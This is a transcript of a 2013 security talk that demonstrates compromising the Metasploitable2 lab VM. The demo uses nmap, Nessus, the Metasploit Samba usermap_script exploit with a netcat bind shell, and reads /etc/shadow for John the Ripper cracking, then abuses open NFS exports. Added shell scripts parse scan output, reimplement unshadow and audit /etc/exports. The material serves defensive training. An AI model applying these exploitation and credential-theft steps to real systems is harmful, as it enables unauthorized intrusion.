The best defense is a good offense (April 2013 Presentation to Atlantic HTCIA chapter)
Transcript

  • 1. “Improving your defensive security posture with offensive security strategies” • Andrew Kozma • HTCIA, Atlantic Chapter Meeting, April 18th, 2013
  • 2. A bit about me… • Infosec professional working in healthcare • Co-founder of AtlSecCon • Midnight ethical hacker • A perpetual student • Security researcher/philosopher • Fan of the blues (secretly want to learn how to play the harmonica)
  • 3. Offensive Security • “How much can you know about yourself if you've never been in a fight?” ~Chuck Palahniuk, Fight Club • Hacking our own infrastructure to improve defensive security measures and processes • Tools – Kali Linux, a security distro maintained by Offensive-Security with all the tools required to test security; it’s free and always will be • Tactics – the application of tools • Strategy – the big picture, all the pieces working together to achieve an ultimate goal
  • 4. Creating a practice environment • “The first rule of fight club is, you don't talk about fight club.” ~Chuck Palahniuk, Fight Club • The goal: a controlled environment where it is safe to practice offensive security techniques • There are many vulnerable distributions that can serve as targets to help build skills (@g0tmi1k’s www.vulnhub.com) • With proper planning and authorization (get it in writing), along with an understanding of the risks, you can test production infrastructure • Virtualization is a beautiful thing!
  • 5. Demo (metasploitable2) • nmap scan – identify the OS, services and open ports • Nessus vulnerability scan – find vulnerabilities that can potentially be exploited • Metasploit console – import the scan results and exploit the target • Post exploitation – crack passwords with John the Ripper, pwn the box
  • 6. Demo (nmap) • Scanning with nmap: -O (OS detection), -sV (service version detection), -sC (default NSE scripts), -oX (output in XML format), --stylesheet nmap.xsl (reference nmap’s stylesheet from the XML), --open (show only open ports), --reason (show why each port is reported in its state) • Copying the stylesheet (nmap.xsl) to our working directory so the XML renders • Displaying the nmap scan in Iceweasel (the Kali Linux browser)
  • 7. Demo (nmap output)
  • 8. Demo (Nessus) • Nessus vulnerability scanner • Not native to Kali Linux • Download the Debian package and install it with “dpkg -i filename.deb” • Register for the Home feed (free) • Connect to the web interface at https://localhost:8834 • Log in and select New Scan
  • 9. Demo (Nessus) • Launch the scan • Nessus indicates the scan progress • A summary is displayed once the scan is complete
  • 10. Demo (Nessus) • Export and save the report (the .nessus XML export is the format Metasploit can import)
  • 11. Demo (Nessus Output)
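The deck only views the -oX output through nmap.xsl in a browser. The script below is an added example (not from the slides) of the other reason to ask for XML: pulling the open ports out of the report with plain sed/grep so they can be fed to other tools or diffed between scans. The XML is a constructed sample in the shape nmap writes for a Metasploitable2-style host (192.0.2.10 is a documentation address, the services and versions are illustrative); in practice you pass the real -oX file.

```shell
#!/bin/sh
# Added example, not part of the original presentation.
# Extract "port/proto service product version" for every open port in an
# nmap -oX report. Uses only grep/sed so it runs on a bare Kali box.

# Constructed sample in nmap's XML layout (one <port> element per line,
# as nmap writes it). Not a real scan result.
nmap_sample_xml() {
  cat <<'EOF'
<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -O -sV -sC --open --reason -oX scan.xml 192.0.2.10" version="6.25">
<host><status state="up" reason="arp-response"/>
<address addr="192.0.2.10" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="21"><state state="open" reason="syn-ack"/><service name="ftp" product="vsftpd" version="2.3.4" method="probed" conf="10"/></port>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/><service name="ssh" product="OpenSSH" version="4.7p1 Debian 8ubuntu1" method="probed" conf="10"/></port>
<port protocol="tcp" portid="139"><state state="open" reason="syn-ack"/><service name="netbios-ssn" product="Samba smbd" version="3.X" method="probed" conf="10"/></port>
<port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/><service name="netbios-ssn" product="Samba smbd" version="3.X" method="probed" conf="10"/></port>
<port protocol="tcp" portid="2049"><state state="open" reason="syn-ack"/><service name="nfs" version="2-4" method="probed" conf="10"/></port>
<port protocol="tcp" portid="8080"><state state="closed" reason="reset"/><service name="http-proxy" method="table" conf="3"/></port>
</ports>
</host>
</nmaprun>
EOF
}

# xml_attr ELEMENT NAME: print the value of attribute NAME from one element
# string. The leading space in the pattern keeps "name" from matching the
# tail of another attribute such as servicefp.
xml_attr() {
  printf '%s\n' "$1" | sed -n "s/.*[ ]$2=\"\([^\"]*\)\".*/\1/p"
}

# nmap_open_ports [FILE]: one line per open port, read from FILE or stdin.
nmap_open_ports() {
  grep '<port ' -- "${1:--}" | grep 'state="open"' | while IFS= read -r line; do
    # isolate the <port ...> and <service .../> elements before reading attributes
    port_el=$(printf '%s\n' "$line" | sed -n 's/.*\(<port [^>]*\).*/\1/p')
    svc_el=$(printf '%s\n' "$line" | sed -n 's/.*\(<service [^>]*\).*/\1/p')
    out="$(xml_attr "$port_el" portid)/$(xml_attr "$port_el" protocol) $(xml_attr "$svc_el" name)"
    # product and version are optional in nmap's output (see the nfs line above)
    for a in product version; do
      v=$(xml_attr "$svc_el" "$a")
      if [ -n "$v" ]; then out="$out $v"; fi
    done
    printf '%s\n' "$out"
  done
}

# Usage: sh nmap_open_ports.sh scan.xml   (no argument: run against the built-in sample)
if [ $# -gt 0 ]; then
  nmap_open_ports "$1"
else
  nmap_sample_xml | nmap_open_ports
fi
```

The closed port 8080 is in the sample on purpose: a scan run without --open still lists closed and filtered ports, and the filter on state="open" is what keeps them out of anything you hand to Metasploit or a ticketing system.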
  • 12. Demo (metasploit) • Opening the Metasploit Framework console: enter the command “msfconsole” • Importing our nmap XML scan results into the Metasploit database: enter the command “db_import /path to the nmap scan”
  • 13. Demo (metasploit) • We can validate the db_import by entering the command “hosts” at the msf prompt • We can also validate the services imported for that host from nmap by entering the command “services” at the msf prompt
  • 14. Demo (metasploit) • Import the Nessus scan into Metasploit with the command “db_import /path to the file” • Now that it is imported we can view the vulnerabilities that Nessus detected with the command “vulns”
  • 15. Demo (metasploit) • For this demo we are going to exploit Samba • Load the exploit in msf with the command “use exploit/multi/samba/usermap_script” • Once the exploit is loaded we can learn more about it via the command “info”
  • 16. Demo (metasploit) • The command “show options” lists the variables that require a value • For this exploit a remote host is required: “set RHOST target.ip.address” • A payload to deliver to the target is also required: “set PAYLOAD cmd/unix/bind/netcat” • A bind payload makes the target listen (on LPORT, 4444 by default), so that port must be reachable from the attacker; use a reverse payload when a firewall is in the way
  • 17. Demo (metasploit) • The command “show options” now shows the values for RHOST and PAYLOAD that we previously set
  • 18. Demo (metasploit) • We attack the target via the command “exploit” • Booyah! Shell access to the target! • We have root-level access to the target (smbd runs as root on this box) and interact via this shell • Let’s display the target system’s user accounts via the command “cat /etc/passwd” • We are going to select the data displayed and copy it to a .txt file
  • 19. Demo (metasploit) • Now we need to grab the password hashes associated with the user accounts we just viewed • This can be done by displaying the hashes via the command “cat /etc/shadow” (readable only because our shell is root) • Once again we will select the information displayed and copy it to a .txt file
  • 20. Demo (Usernames and Hashes)
  • 21. Demo (John The Ripper) • We are going to use John the Ripper to crack the passwords for the user accounts • For John to crack them we have to combine the usernames and their hashes into a format that John understands • We combine both files into a single one with the command “unshadow /path/passwd.txt /path/shadow.txt > unshadowed.txt” • We now have a file with usernames and hashes that John can use
  • 22. Demo (John The Ripper) • We are going to take a quick peek at the contents of the new file • To do this we change to the directory the file resides in: “cd HTCIA” • We can display the contents of this file in the terminal with the command “cat unshadowed.txt”
  • 23. Demo (John The Ripper) • To start cracking the passwords with John we issue the command “john /path to the filename.txt” • John loads the hashes and successfully cracks some of the passwords (its default run tries single-crack mode, then a wordlist with rules, then incremental mode, so the weakest passwords fall first) • Previously cracked passwords can be viewed with the command “john --show /path to the file.txt”
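Slides 21 to 23 treat unshadow as a black box. As an added example (not from the deck) the script below does the same join in awk, so you can see exactly what John is given, and then reports which accounts actually have a crackable hash and of what type, which tells you what to expect from John's "Loaded N password hashes" line. The passwd and shadow content is a constructed sample shaped like Metasploitable2's files (the $1$ MD5-crypt prefix is what that image uses); every hash value is a fake placeholder, not a real hash.

```shell
#!/bin/sh
# Added example, not part of the original presentation.
# 1) unshadow_awk: what `unshadow passwd shadow` does, written out in awk
# 2) crackable_hashes: which accounts in the combined file John can work on

# Constructed sample passwd (layout of Metasploitable2, values illustrative)
sample_passwd() {
  cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
EOF
}

# Constructed sample shadow. Hash values are FAKE placeholders.
sample_shadow() {
  cat <<'EOF'
root:$1$saltsalt$FAKEroot0000000000000:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
msfadmin:$1$saltsalt$FAKEmsfadmin00000000:14684:0:99999:7:::
user:$1$saltsalt$FAKEuser0000000000000:14699:0:99999:7:::
service:$6$saltsaltsaltsalt$FAKEservice00000000000000000000:14742:0:99999:7:::
EOF
}

# unshadow_awk PASSWD SHADOW
# Read shadow first (NR==FNR) to build user -> hash, then replace the "x"
# in field 2 of each passwd line with that hash. Output keeps passwd order,
# which is the same join the real unshadow performs.
unshadow_awk() {
  awk -F: -v OFS=: '
    NR == FNR { hash[$1] = $2; next }
    { if ($1 in hash) $2 = hash[$1]; print }
  ' "$2" "$1"
}

# crackable_hashes UNSHADOWED
# Print "user hashtype" for accounts with a real hash. Locked accounts
# (*, !, !!) and empty fields are skipped: John cannot load them either.
crackable_hashes() {
  awk -F: '{
    h = $2
    if (h == "" || h ~ /^[*!]/) next          # locked account or no password
    split(h, p, "$")                           # "$id$salt$hash" -> p[2] is the id
    id = (h ~ /^\$/) ? p[2] : ""
    if (id == "1")               t = "md5crypt"
    else if (id == "5")          t = "sha256crypt"
    else if (id == "6")          t = "sha512crypt"
    else if (id ~ /^2[abxy]?$/)  t = "bcrypt"
    else if (length(h) == 13)    t = "descrypt"   # classic 13-char DES crypt
    else                         t = "unknown"
    print $1, t
  }' "$1"
}

# Usage: sh unshadow_demo.sh passwd.txt shadow.txt   (no arguments: run the sample)
if [ $# -eq 2 ]; then
  unshadow_awk "$1" "$2"
else
  tmp=$(mktemp -d)
  sample_passwd > "$tmp/passwd.txt"
  sample_shadow > "$tmp/shadow.txt"
  unshadow_awk "$tmp/passwd.txt" "$tmp/shadow.txt" > "$tmp/unshadowed.txt"
  crackable_hashes "$tmp/unshadowed.txt"      # then: john unshadowed.txt
  rm -rf "$tmp"
fi
```

The hash type matters for both sides: MD5-crypt is fast enough that John gets through a wordlist quickly, which is why the demo cracks passwords in seconds; on the defensive side, a shadow file full of $6$ (SHA-512-crypt) or bcrypt entries and locked service accounts is what you want to see when you audit your own hosts.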
  • 24. Demo (Post Exploitation) • Using our new creds to SSH to the exploited workstation • To connect via SSH we use the command “ssh -l msfadmin Target.IP.Address” • Now we have a proper interactive terminal session rather than the bare netcat shell • In the real world an attacker could continue to install backdoors, steal data, and pivot to scan for other hosts
  • 25. Demo (Post Exploitation) • Let’s review other services so that we can maintain a persistent presence on the compromised workstation • Hmmm, NFS services are running on the target…
  • 26. Demo (Post Exploitation) • Let’s take a quick look at the NFS shares available on the target (showmount -e lists the exports) • Uh oh… everything is shared: the root filesystem is exported to any host • We are going to create a temp directory and then mount the share in it • Let’s display the mounted filesystems to see the NFS share mounted in our temp directory
  • 27. Demo (Post Exploitation) • Looking into the share that we mounted… • We already know we can copy the contents of the passwd and shadow files again, this time with no exploit needed
  • 28. Demo (Post Exploitation) • Remember our Nessus output • Collect as much information as possible during the information gathering phase… • Sometimes you get lucky! The VNC server password was identified in the scan by Nessus
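The NFS finding on slides 25 to 27 is a configuration problem, so the defensive counterpart is a check you can run on your own servers. The script below is an added example (not from the deck): it reads an /etc/exports file and flags the root filesystem being exported, exports open to every host, world-writable exports, and no_root_squash (which lets root on any permitted client write root-owned files into the export). The exports content is a constructed sample; the 192.0.2.0/24 addresses are documentation ranges.

```shell
#!/bin/sh
# Added example, not part of the original presentation.
# Audit /etc/exports for the misconfigurations the Metasploitable2 demo
# relies on. Output: one finding per line, "<path> <client> <finding>".

# Constructed sample /etc/exports (not a real server's file)
sample_exports() {
  cat <<'EOF'
# /etc/exports: constructed sample
/ *(rw,sync,no_subtree_check)
/exports/users (rw)
/home/backup 192.0.2.0/24(rw,sync,no_root_squash)
/srv/iso 192.0.2.50(ro,sync,root_squash)
EOF
}

# audit_exports [FILE]: audit FILE or stdin. Export paths containing spaces
# are not handled (exportfs quotes them; this sample does not).
audit_exports() {
  awk '
    /^[ \t]*#/ || NF == 0 { next }           # comments and blank lines
    {
      path = $1
      for (i = 2; i <= NF; i++) {
        client = $i; opts = ""
        if (match(client, /\(/)) {           # split "host(options)"
          opts = substr(client, RSTART + 1); sub(/\)$/, "", opts)
          client = substr(client, 1, RSTART - 1)
        }
        if (client == "") client = "*"       # "/path (rw)": a bare option list means everyone
        if (client == "*") print path, client, "exported-to-all-hosts"
        if (path == "/") print path, client, "root-filesystem-exported"
        if (opts ~ /(^|,)no_root_squash(,|$)/) print path, client, "no_root_squash"
        if (client == "*" && opts ~ /(^|,)rw(,|$)/) print path, client, "world-writable"
      }
    }' "${1:--}"
}

# Usage: sh audit_exports.sh /etc/exports   (no argument: audit the built-in sample)
if [ $# -gt 0 ]; then
  audit_exports "$1"
else
  sample_exports | audit_exports
fi
```

The clean line in the sample, /srv/iso exported read-only to one host with root_squash (the default), is the shape to aim for: a specific path, a specific client, ro unless writes are genuinely needed, and root squashed. Note that "/exports/users (rw)" with a space before the parenthesis is the classic typo that silently turns a per-host option list into an export for everyone; the audit treats it the same as "*".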
  • 29. Breaking things to make them better • “At the time, my life just seemed too complete, and maybe we have to break everything to make something better out of ourselves.” ~Chuck Palahniuk, Fight Club • When you start looking at production systems it is important to have a demonstrated, repeatable process that has buy-in from management • Document your findings, indicating the threat, the likelihood of occurrence and the impact to the business • Use this information to build business cases for investment in security solutions • When you start looking at the production environment… there will be blood…
  • 30. Advanced Persistent Response • “On a long enough time line, the survival rate for everyone drops to zero.” ~Chuck Palahniuk, Fight Club • Understanding trends and current threats • Filling in the gaps with security (technology and process) • Creating and implementing a security model that meets organizational needs
  • 31. Incident Response • “With a gun barrel between your teeth, you speak only in vowels.” ~Chuck Palahniuk, Fight Club • Preparation – have a plan, know who to call and when • Identification – determine whether or not there was an incident • Containment – protect other critical systems, “stop the bleeding” • Eradication – address the vulnerabilities that were exploited • Recovery – return to operational status • Follow up – lessons learned, prevent future incidents of the same nature
  • 32. Parting thoughts • Do you still think the best defense is a good offense? • IMHO ~ a good offense helps to make a great defense! (with proper planning and execution)
  • 33. References • Jeremy Druin (@webpwnized) has a great tutorial online going into more detail: http://www.youtube.com/watch?v=0fbBwGAuINw • @netbiosx has a tutorial available online regarding NFS and Metasploitable2: http://pentestlab.wordpress.com/2013/01/20/nfs-misconfiguration/ • Nessus software and Home feed licensing can be found on Tenable’s site: http://www.tenable.com/ • Kali Linux can be obtained at www.kali.org and is maintained by Offensive-Security • Metasploitable2 is maintained by Rapid7 and is available for download from: https://community.rapid7.com/docs/DOC-1875 • Why stop here! There are many other distros to help expand your skillset; check out @g0tmi1k and his website at http://vulnhub.com/
  • 34. Thank you • Twitter handle – @k0z1can • ca.linkedin.com/in/andrewkozma/